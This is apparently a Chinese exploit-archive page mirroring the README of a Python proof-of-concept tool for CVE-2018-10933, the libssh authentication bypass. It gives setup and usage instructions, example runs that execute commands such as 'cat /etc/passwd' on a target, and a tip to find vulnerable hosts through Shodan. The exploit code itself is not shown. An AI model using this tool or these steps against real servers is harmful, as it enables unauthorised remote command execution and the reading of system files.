POC详情: c32ee943314ab34a0b1b88a676b09c47c9b03cec

来源
https://github.com/Rubikcuv5/CVE-2018-10933
关联漏洞
标题: libssh server-side state machine 安全漏洞 (CVE-2018-10933)
描述:libssh是一个用于访问SSH服务的C语言开发包,它能够执行远程命令、文件传输,同时为远程的程序提供安全的传输通道。server-side state machine是其中的一个服务器端状态机。 libssh的server-side state machine 0.7.6之前版本和0.8.4之前版本中存在安全漏洞。攻击者可借助恶意的客户端利用该漏洞在不进行身份验证的情况下创建通道,进而获取未授权的访问权限。
描述
libSSH-Authentication-Bypass
介绍

# CVE-2018-10933
![](https://www.bastify.com/wp-content/uploads/2019/02/ssh-tunneling.png)

***
A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4.
A malicious client could create channels without first performing authentication, resulting in unauthorized access.

## SOME DETAILS
The issue comes from the way libssh doesn't maintain state for the authentication and how this can be used to bypass the authentication. Basically, think of the connection as a multi-step process: step1, step2, step3... Since libssh doesn't enforce the order of the steps, you can basically jump to step3 without going through step1 and step2.

Interestingly, the same issue was found in the SSH library Paramiko earlier: CVE-2018-7750.

## Documentation
Exploit-DB : https://www.exploit-db.com/exploits/45638

Information about CVE-2018-10933 by libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt

Bugfix Release by libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/

## Setup

```
sudo apt-get install python3

gh repo clone EmmanuelCruzL/CVE-2018-10933

pip3 install -r requirements.txt

python3 main.py

```
## Usage
```
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host

Script for the vulnerabilities CVE-2018-10933

positional arguments:
  host                  the ip or domain address of ssh server

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  The port the service ssh, default [22]
  -log, --logfile       Logfile to write conn logs
  -t, --test            check the version of libSSH
  -c COMMAND, --command COMMAND
                        command to execute
  -i, --interactive     open the interactive mode
   
```

## EXAMPLES POC

### EXAMPLE( check if the host is vulnerable)
```
python3 main.py  0.0.0.0 -port 22  -t
```
![](https://imgr.co/cache/img/2b54583d34c2d1406025927166ad6d1f.jpg)

### EXAMPLE( send command via argument)
```
python3 main.py  0.0.0.0 -p 22  -c "cat /etc/passwd"
```
![](https://i.imgur.com/mGCfyt4.png)

### EXAMPLE( using interactive simple console)
```
python3 main.py  0.0.0.0 -p 22  -l
```
![](https://i.imgur.com/F2f3ral.png)


## Shodan.io libSSH
  ```diff
 [!] can find  devices vulnerables using shodan.io 
 -  ( 22 Port is default, other ports like (2222, 3333, 4444) might be including libSSH )
```

![](https://i.imgur.com/MBUWEg4.png)


## Authors

- [Rubickcuv](https://github.com/EmmanuelCruzL)
文件快照

 [4.0K]  /data/pocs/c32ee943314ab34a0b1b88a676b09c47c9b03cec
├── [4.0K]  logs
│   ├── [3.4K]  log_libssh_192.168.8.24_2022-07-28T09:07:37.182989.log
│   ├── [   0]  log_libssh_192.168.8.24_2022-07-28T09:08:11.296178.log
│   └── [3.4K]  log_libssh_192.168.8.24_2022-07-28T09:09:05.689190.log
├── [3.5K]  main.py
├── [2.4K]  README.md
├── [  30]  requirements.txt
└── [1.6K]  server.py

1 directory, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。